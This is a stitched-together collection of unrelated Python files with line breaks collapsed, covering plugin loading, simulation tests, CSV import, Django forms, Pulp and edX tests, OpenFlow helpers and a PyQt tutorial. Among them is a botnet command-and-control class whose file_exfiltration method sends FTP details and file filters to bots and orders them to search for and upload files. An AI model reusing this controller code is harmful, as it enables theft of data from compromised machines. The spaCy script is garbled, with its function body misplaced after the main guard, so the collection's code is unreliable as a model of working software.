import logging import contextlib import sys import tempfile import shutil import glob from os import getcwd, chdir from straight.plugin import load logger = logging.getLogger(__name__) PLUGIN_NAMESPACE = 'vdt.versionplugin' class UnknownPlugin(Exception): def __init__(self, plugins): self.message = "Plugin unknown, try one of %s" % plugins def load_plugin_by_name(name): """ Load the plugin with the specified name. >>> plugin = load_plugin_by_name('default') >>> api = dir(plugin) >>> 'build_package' in api True >>> 'get_version' in api True >>> 'set_package_version' in api True >>> 'set_version' in api True """ plugins = load(PLUGIN_NAMESPACE) full_name = "%s.%s" % (PLUGIN_NAMESPACE, name) try: plugins = (plugin for plugin in plugins if plugin.__name__ == full_name) plugin = next(plugins) return plugin except StopIteration: raise UnknownPlugin([plugin.__name__.split('.').pop() for plugin in plugins]) def query_yes_no(question, default="yes"): """Ask a yes/no question via raw_input() and return their answer. "question" is a string that is presented to the user. "default" is the presumed answer if the user just hits <Enter>. It must be "yes" (the default), "no" or None (meaning an answer is required of the user). The "answer" return value is one of "yes" or "no". """ valid = {"yes":True, "y":True, "ye":True, "no":False, "n":False} if default == None: prompt = " [y/n] " elif default == "yes": prompt = " [Y/n] " elif default == "no": prompt = " [y/N] " else: raise ValueError("invalid default answer: '%s'" % default) while True: sys.stdout.write(question + prompt) choice = raw_input().lower() if default is not None and choice == '': return valid[default] elif choice in valid: return valid[choice] else: sys.stdout.write("Please respond with 'yes' or 'no' "\ "(or 'y' or 'n').\n") @contextlib.contextmanager def change_directory(path=None): """ Context manager that changes directory and resets it when existing >>> with change_directory('/tmp'): >>> pass """ if path is not None: try: oldpwd = getcwd() logger.debug('changing directory from %s to %s' % (oldpwd, path)) chdir(path) yield finally: chdir(oldpwd) else: yield @contextlib.contextmanager def empty_directory(path=None): """ Context manager that creates a temporary directory, and cleans it up when exiting. >>> with empty_directory(): >>> pass """ install_dir = tempfile.mkdtemp(dir=path) try: yield install_dir finally: shutil.rmtree(install_dir)
#pythran export loopy(int list list, int, int, int) #runas data = [[1, 45, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 60, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] ; loopy(data, 0, 100, 100) #skip.bench data = [[1, 45, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] + [[0, 60, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0]] * 200 ; loopy(data, 0, 100, 100) TOO_SLOW def _WarningErrorHandler(msg,fatal, _WarningCount): if _WarningCount > 200: raise RuntimeError(msg) else: return _WarningCount +1 def loopy(_PopulationSetInfo_Data, _WarningCount, _NumberOfTriesToGenerateThisIndividual, _NumberOfTriesToGenerateThisSimulationStep): #### Functions Allowed in Expressions #### IndividualID = 0 Repetition = 0 Time = 0 _ResultsInfo_Data = [] #### Create State Handler Functions and State Classification Vector ##### ############### Execute Simulation ############### ####### Subject Loop ####### _Subject = 0 while _Subject < (len(_PopulationSetInfo_Data)): IndividualID = IndividualID +1 # Comment/Uncomment the next line to disable/enable printing of verbose information #print "Simulating Individual #" + str(IndividualID) _NumberOfTriesToGenerateThisIndividual = 1 ##### Repetition Loop ##### Repetition = 0 while Repetition < (1000): # Reset repeat individual repetition flag in case it was set _RepeatSameIndividualRepetition = False #Init all parameters - Resetting them to zero # Comment/Uncomment the next line to disable/enable printing of verbose information #print " Repetition = " + str(Repetition) Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 # Init parameters from population set [Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] = _PopulationSetInfo_Data[IndividualID-1] # Init parameters from Initialization Phase # Reset time and load first vector into results Time = 0 # Load the initial condition into the results vector for this individual _ResultsInfoForThisIndividual = [ [IndividualID, Repetition, Time ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] ] _Terminate_Time_Loop = False or State3Terminal != 0 _NumberOfTriesToGenerateThisSimulationStep = 0 _RepeatSameSimulationStep = False ##### Time Loop ##### while Time < 3: if _RepeatSameSimulationStep: # if repeating the same simulation step, reset the flag to avoid infinite loops _RepeatSameSimulationStep = False # Load the previous time step results into the results vector for this individual [_IgnoreIndividualID, _IgnoreRepetition, _IgnoreTime ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered] = _ResultsInfoForThisIndividual[-1] _Terminate_Time_Loop = False elif _Terminate_Time_Loop: # If the time loop has to be terminated break else: # If not repeating the same simulation step, nor terminating, increase the time counter Time = Time + 1 # Comment/Uncomment the next line to disable/enable printing of verbose information #print " Time Step = " + str(Time) # Reset Warning/Error Count _WarningCountBeforeThisSimulationStep = _WarningCount # Increase the number of Tries counter _NumberOfTriesToGenerateThisSimulationStep = _NumberOfTriesToGenerateThisSimulationStep + 1 ##### Phase 1 - Pre State Transition ##### # Processing the rule: "Affected Parameter: Age; Simulation Phase: Pre-stateOccurrence Probability: 1; Applied Formula: Age +1; Rule Notes: Age Increase; ; _LastExpressionString = "Processing the expression: _Threshold = 1 ." # This expression should expand to: _Threshold = 1 try: # Building Step #0: _Threshold = 1 _Temp = 1 if not (-1e-14 <= _Temp <= 1.00000000000001): _WarningCount = _WarningErrorHandler("The occurrence probability threshold defined by a rule does not evaluate to a number between 0 and 1 within a tolerance specified by the system option parameter SystemPrecisionForProbabilityBoundCheck. The occurrence probability was evaluated to: " + str(_Temp) + " for the rule: " + 'Affected Parameter: Age; Simulation Phase: Pre-stateOccurrence Probability: 1; Applied Formula: Age +1; Rule Notes: Age Increase; ; ', True, _WarningCount) except: _WarningCount = _WarningErrorHandler(_LastExpressionString, True, _WarningCount) # Expression building complete - assign to destination parameter _Threshold = _Temp if 0.5 < _Threshold: _LastExpressionString = "Processing the expression: Age = Age +1 ." # This expression should expand to: Age = Age +1 try: # Building Step #0: Age = Age _Temp0 = Age # Building Step #1: Age = Age +1 _Temp = _Temp0 +1 except: _WarningCount = _WarningErrorHandler(_LastExpressionString, True, _WarningCount) # Expression building complete - assign to destination parameter Age = _Temp pass ##### End of Rule Processing ##### ##### Error Handlers ##### if _WarningCount <= _WarningCountBeforeThisSimulationStep: # Load New results to the results vector _ResultsInfoForThisIndividual.append([IndividualID, Repetition, Time ,Gender, Age, State0, State1, State2, State3Terminal, Example_6___Main_Process, Example_6___Main_Process_Entered, State0_Entered, State1_Entered, State2_Entered, State3Terminal_Entered]) _NumberOfTriesToGenerateThisSimulationStep = 0 else: #print " Repeating the same simulation step due to an error - probably a bad validity check" _RepeatSameSimulationStep = True if _NumberOfTriesToGenerateThisSimulationStep >= 5: if _NumberOfTriesToGenerateThisIndividual < 2: # Repeat the calculations for this person _RepeatSameIndividualRepetition = True break else: _WarningCount = _WarningErrorHandler("The simulation was halted since the number of tries to recalculate the same person has been exceeded. If this problem consistently repeats itself, check the formulas to see if these cause too many out of bounds numbers to be generated. Alternatively, try raising the system option NumberOfTriesToRecalculateSimulationOfIndividualFromStart which is now defined as 2 . ", True, _WarningCount) if _RepeatSameIndividualRepetition: #print " Repeating the same repetition for the same individual due to exceeding the allowed number of simulation steps recalculations for this individual" _NumberOfTriesToGenerateThisIndividual = _NumberOfTriesToGenerateThisIndividual + 1 else: # If going to the next individual repetition, save the results and increase the counter # Load New results to the results vector _ResultsInfo_Data.extend(_ResultsInfoForThisIndividual) Repetition = Repetition + 1 _Subject = _Subject + 1 # Comment/Uncomment the next lines to disable/enable dumping output file return _ResultsInfo_Data
#!/usr/bin/env python # ServerCommand import core import copy from config import server_desc class ServerCMD(core.ServerCMD): def __init__(self, desc=server_desc): core.ServerCMD.__init__(self, desc) def forward_to_bots(self, sock, data): self.logger.info('start to echo_bots' ) new_data = copy.deepcopy(data) new_data['event'] = data['bot_event'] del new_data['bot_event'] for client_sock in self.node.client_socks: self.node.send(client_sock, self._dump_json(new_data)) def send_cmd_to_bots(self, cmd, bots=None, broke_socks=[]): self.logger.debug('send command to bots') sock_num = len(self.node.client_socks) if not bots: bots = range(sock_num) print 'sock_num', sock_num print 'broke_socks', broke_socks client_socks = self.node.client_socks # import pdb;pdb.set_trace() new_broke_socks = [] self.logger.debug('cmd [%s] will be send to bots: [%s]'%(str(cmd), str(bots))) for bot_id in bots: if bot_id in broke_socks: continue client_sock = client_socks[bot_id] try: print 'result, ', self._dump_json(cmd) self.node.send(client_sock, self._dump_json(cmd)) # self.node.send(client_sock, 'connect_ack') # print 'self.node.send finished' except IOError: self.logger.info('sock has been closed, cannot send command, \ you have lost control over this bot') new_broke_socks.append(bot_id) return new_broke_socks + broke_socks def file_exfiltration(self, sock, data): """ command: """ self.logger.info('start to issue file exfiltration command') bots = data.get('bots', None) # for client_sock in self.node.client_socks: cmd = copy.deepcopy(self.desc['ftp']) cmd['event'] = 'set_ftp_info' broke_socks = self.send_cmd_to_bots(cmd) cmd = copy.deepcopy(self.desc['file_filter']) cmd['event'] = 'set_file_filter' broke_socks = self.send_cmd_to_bots(cmd, broke_socks) cmd = dict(event='search_and_upload') broke_socks = self.send_cmd_to_bots(cmd, broke_socks) self.node.close_socks(broke_socks, 'client') self.logger.debug('broke_socks %s'%(str(broke_socks)))
import uuid import os import csv from sqlalchemy.exc import IntegrityError from flask import request, current_app from flask_restful import Resource from flask_jwt_extended import jwt_required from zou.app import app from zou.app.utils import permissions from zou.app.services import user_service, projects_service class ImportRowException(Exception): message = "" line_number = 0 def __init__(self, message, line_number): Exception.__init__(self, message) self.message = message self.line_number = line_number class BaseCsvImportResource(Resource): def __init__(self): Resource.__init__(self) @jwt_required def post(self): uploaded_file = request.files["file"] file_name = "%s.csv" % uuid.uuid4() file_path = os.path.join(app.config["TMP_DIR"], file_name) uploaded_file.save(file_path) self.is_update = request.args.get("update", "false") == "true" try: result = self.run_import(file_path) return result, 201 except ImportRowException as e: current_app.logger.error("Import failed: %s" % e) return self.format_error(e), 400 def format_error(self, exception): return { "error": True, "message": exception.message, "line_number": exception.line_number, } def run_import(self, file_path): result = [] self.check_permissions() self.prepare_import() delimiter = self.get_delimiter(file_path) with open(file_path) as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) for row in reader: row = self.import_row(row) result.append(row) return result def get_delimiter(self, file_path): delimiter = "," with open(file_path) as csvfile: try: content = csvfile.read() sniffer = csv.Sniffer() dialect = sniffer.sniff(content) delimiter = dialect.delimiter except: pass return delimiter def prepare_import(self): pass def check_permissions(self): return permissions.check_manager_permissions() def import_row(self): pass def add_to_cache_if_absent(self, cache, retrieve_function, name): if name not in cache: cache[name] = retrieve_function(name) return cache[name] def get_id_from_cache(self, cache, name): cached_object = cache[name] if type(cached_object) is dict: return cached_object["id"] else: return cached_object.id class BaseCsvProjectImportResource(BaseCsvImportResource): @jwt_required def post(self, project_id): uploaded_file = request.files["file"] file_name = "%s.csv" % uuid.uuid4() file_path = os.path.join(app.config["TMP_DIR"], file_name) uploaded_file.save(file_path) self.is_update = request.args.get("update", "false") == "true" try: result = self.run_import(project_id, file_path) return result, 201 except ImportRowException as e: return self.format_error(e), 400 def run_import(self, project_id, file_path): result = [] self.check_project_permissions(project_id) self.prepare_import(project_id) delimiter = self.get_delimiter(file_path) with open(file_path) as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) line_number = 1 for row in reader: try: row = self.import_row(row, project_id) result.append(row) except IntegrityError as e: raise ImportRowException(e._message(), line_number) except KeyError as e: raise ImportRowException( "A columns is missing: %s" % e.args, line_number ) line_number += 1 return result def check_project_permissions(self, project_id): return user_service.check_manager_project_access(project_id) def import_row(self, project_id): pass def get_descriptor_field_map(self, project_id, entity_type): descriptor_map = {} descriptors = projects_service.get_metadata_descriptors(project_id) for descriptor in descriptors: if descriptor["entity_type"] == entity_type: descriptor_map[descriptor["name"]] = descriptor["field_name"] return descriptor_map
from __future__ import unicode_literals from __future__ import print_function import sys import plac import bz2 import ujson import spacy.en def main(input_loc): nlp = spacy.en.English() # Load the model takes 10-20 seconds. for line in bz2.BZ2File(input_loc): # Iterate over the Reddit comments from the dump. comment_str = ujson.loads(line)['body'] # Parse the json object, and extract the 'body' attribute. def google_doing_something(w): if w.lower_ != 'google': return False # Is it the subject of a verb? elif w.dep_ != 'nsubj': return False # And not 'is' elif w.head.lemma_ == 'be' and w.head.dep_ != 'aux': return False # Exclude e.g. "Google says..." elif w.head.lemma_ in ('say', 'show'): return False else: return True if __name__ == '__main__': plac.call(main) comment_parse = nlp(comment_str) for word in comment_parse: if google_doing_something(word): # Print the clause print(''.join(w.string for w in word.head.subtree).strip())
import floppyforms.__future__ as forms from django.contrib.contenttypes.generic import GenericForeignKey from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from ..base import BaseRelationListField from .widgets import GenericRelationListWidget __all__ = ('GenericRelationListField',) def get_default_form(model, ct_field, fk_field, order_field, related_models): form_fields = (ct_field, fk_field) if order_field: form_fields = (order_field,) + form_fields class GenericRelationListForm(forms.ModelForm): class Meta: fields = form_fields def clean(self): cleaned_data = super(GenericRelationListForm, self).clean() content_type = cleaned_data.get(ct_field) if content_type: if content_type.model_class() not in related_models: self.add_error(field=ct_field, error=_( 'The selected type {type} is not allowed here. ' 'Choose one of the following: {allowed}'.format( type=content_type, allowed=', '.join( force_text(model._meta.verbose_name) for model in related_models)) )) return cleaned_data return GenericRelationListForm class GenericRelationListField(BaseRelationListField): widget = GenericRelationListWidget def __init__(self, *args, **kwargs): assert 'related_models' in kwargs, ( 'related_models argument is required') self.generic_fk_name = kwargs.pop('generic_fk_name', None) model = kwargs['model'] generic_fk = self.get_generic_foreign_key(model) kwargs.setdefault('form', get_default_form( model=model, order_field=kwargs.get('order_field', None), fk_field=generic_fk.fk_field, ct_field=generic_fk.ct_field, related_models=kwargs['related_models'])) super(GenericRelationListField, self).__init__(*args, **kwargs) self.determine_generic_relation_fields(model) def get_generic_foreign_key(self, model): if self.generic_fk_name is not None: return model._meta.get_field(self.generic_fk_name) generic_fks = [ field for field in model._meta.get_fields() if isinstance(field, GenericForeignKey)] assert len(generic_fks) == 1, ( 'Given model {model} requires exactly one GenericForeignKey.') return generic_fks[0] def determine_generic_relation_fields(self, model): generic_fk = self.get_generic_foreign_key(model) self.widget.set_object_id_field_name(generic_fk.fk_field) self.widget.set_content_type_field_name(generic_fk.ct_field)
from pulp.client.commands.options import OPTION_REPO_ID from pulp.client.commands.schedule import ( DeleteScheduleCommand, ListScheduleCommand, CreateScheduleCommand, UpdateScheduleCommand, NextRunCommand) from pulp_win.extensions.admin import sync_schedules from ...testbase import PulpClientTests class StructureTests(PulpClientTests): def test_pkg_list_schedule_command(self): command = sync_schedules.PkgListScheduleCommand(self.context) self.assertTrue(isinstance(command, ListScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'list') self.assertEqual(command.description, sync_schedules.DESC_LIST) def test_pkg_create_schedule_command(self): command = sync_schedules.PkgCreateScheduleCommand(self.context) self.assertTrue(isinstance(command, CreateScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'create') self.assertEqual(command.description, sync_schedules.DESC_CREATE) def test_pkg_delete_schedule_command(self): command = sync_schedules.PkgDeleteScheduleCommand(self.context) self.assertTrue(isinstance(command, DeleteScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'delete') self.assertEqual(command.description, sync_schedules.DESC_DELETE) def test_pkg_update_schedule_command(self): command = sync_schedules.PkgUpdateScheduleCommand(self.context) self.assertTrue(isinstance(command, UpdateScheduleCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'update') self.assertEqual(command.description, sync_schedules.DESC_UPDATE) def test_pkg_next_run_command(self): command = sync_schedules.PkgNextRunCommand(self.context) self.assertTrue(isinstance(command, NextRunCommand)) self.assertTrue(OPTION_REPO_ID in command.options) self.assertEqual(command.name, 'next') self.assertEqual(command.description, sync_schedules.DESC_NEXT_RUN)
""" Test the course_info xblock """ import mock from django.test.utils import override_settings from django.core.urlresolvers import reverse from .helpers import LoginEnrollmentTestCase from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory @override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE) class CourseInfoTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase): def setUp(self): self.course = CourseFactory.create() self.page = ItemFactory.create( category="course_info", parent_location=self.course.location, data="OOGIE BLOOGIE", display_name="updates" ) def test_logged_in_unenrolled(self): self.setup_user() url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn("OOGIE BLOOGIE", resp.content) self.assertIn("You are not currently enrolled in this course", resp.content) def test_logged_in_enrolled(self): self.enroll(self.course) url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertNotIn("You are not currently enrolled in this course", resp.content) def test_anonymous_user(self): url = reverse('info', args=[self.course.id.to_deprecated_string()]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertNotIn("OOGIE BLOOGIE", resp.content) @override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE) class CourseInfoTestCaseXML(LoginEnrollmentTestCase, ModuleStoreTestCase): # The following XML test course (which lives at common/test/data/2014) # is closed; we're testing that a course info page still appears when # the course is already closed xml_course_id = 'edX/detached_pages/2014' # this text appears in that course's course info page # common/test/data/2014/info/updates.html xml_data = "course info 463139" @mock.patch.dict('django.conf.settings.FEATURES', {'DISABLE_START_DATES': False}) def test_logged_in_xml(self): self.setup_user() url = reverse('info', args=[self.xml_course_id]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn(self.xml_data, resp.content) @mock.patch.dict('django.conf.settings.FEATURES', {'DISABLE_START_DATES': False}) def test_anonymous_user_xml(self): url = reverse('info', args=[self.xml_course_id]) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertNotIn(self.xml_data, resp.content)
# Copyright (C) 2015 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import re def generate(modname): import sys import functools mod = sys.modules[modname] def add_attr(k, v): setattr(mod, k, v) add_attr('ofp_msg_type_to_str', functools.partial(_msg_type_to_str, mod)) add_attr('ofp_error_type_to_str', functools.partial(_error_type_to_str, mod)) add_attr('ofp_error_code_to_str', functools.partial(_error_code_to_str, mod)) add_attr('ofp_error_to_jsondict', functools.partial(_error_to_jsondict, mod)) def _get_value_name(mod, value, pattern): for k, v in mod.__dict__.items(): if k.startswith(pattern): if v == value: return k return 'Unknown' def _msg_type_to_str(mod, type_): """ This method is registered as ofp_msg_type_to_str(type_) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the message type as a string value for given 'type' defined in ofp_type enum. Example:: >>> ofproto.ofp_msg_type_to_str(14) 'OFPT_FLOW_MOD(14)' """ return '%s(%d)' % (_get_value_name(mod, type_, 'OFPT_'), type_) def _error_type_to_str(mod, type_): """ This method is registered as ofp_error_type_to_str(type_) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the error type as a string value for given 'type' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_type_to_str(4) 'OFPET_BAD_MATCH(4)' """ return '%s(%d)' % (_get_value_name(mod, type_, 'OFPET_'), type_) def _get_error_names(mod, type_, code): t_name = _get_value_name(mod, type_, 'OFPET_') if t_name == 'Unknown': return 'Unknown', 'Unknown' # Construct error code name pattern # e.g.) "OFPET_BAD_MATCH" -> "OFPBMC_" if t_name == 'OFPET_FLOW_MONITOR_FAILED': c_name_p = 'OFPMOFC_' else: c_name_p = 'OFP' for m in re.findall("_(.)", t_name): c_name_p += m.upper() c_name_p += 'C_' c_name = _get_value_name(mod, code, c_name_p) return t_name, c_name def _error_code_to_str(mod, type_, code): """ This method is registered as ofp_error_code_to_str(type_, code) method into ryu.ofproto.ofproto_v1_* modules. And this method returns the error code as a string value for given 'type' and 'code' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_code_to_str(4, 9) 'OFPBMC_BAD_PREREQ(9)' """ (_, c_name) = _get_error_names(mod, type_, code) return '%s(%d)' % (c_name, code) def _error_to_jsondict(mod, type_, code): """ This method is registered as ofp_error_to_jsondict(type_, code) method into ryu.ofproto.ofproto_v1_* modules. And this method returns ofp_error_msg as a json format for given 'type' and 'code' defined in ofp_error_msg structure. Example:: >>> ofproto.ofp_error_to_jsondict(4, 9) {'code': 'OFPBMC_BAD_PREREQ(9)', 'type': 'OFPET_BAD_MATCH(4)'} """ (t_name, c_name) = _get_error_names(mod, type_, code) return {'type': '%s(%d)' % (t_name, type_), 'code': '%s(%d)' % (c_name, code)}
# 进度条 进度条的默认值是0~99。 import sys from PyQt5.QtWidgets import (QWidget, QProgressBar, QPushButton, QApplication) from PyQt5.QtCore import QBasicTimer class Example(QWidget): def __init__(self): super().__init__() self.initUI() def initUI(self): self.pbar = QProgressBar(self) self.pbar.setGeometry(30, 40, 200, 25) self.btn = QPushButton('Start', self) self.btn.move(40, 80) self.btn.clicked.connect(self.doAction) # 设置一个定时器来激活进度条 self.timer = QBasicTimer() self.step = 0 self.setGeometry(300, 300, 280, 170) self.setWindowTitle('QProgressBar') self.show() # 每个QObject类和它的子类都有timerEvent()事件处理函数用于处理定时事件。 # 为了对定时器事件作出反馈,我们重新实现了这个事件处理函数。 def timerEvent(self, e): if self.step >= 100: self.timer.stop() self.btn.setText('Finished') return self.step = self.step + 1 self.pbar.setValue(self.step) # 开始和停止定时器。 def doAction(self): if self.timer.isActive(): self.timer.stop() self.btn.setText('Start') else: # 开启定时器时间 调用了start方法。 (定时时间 接受定时器时间的对象) self.timer.start(100, self) self.btn.setText('Stop') if __name__ == '__main__': app = QApplication(sys.argv) ex = Example() sys.exit(app.exec_())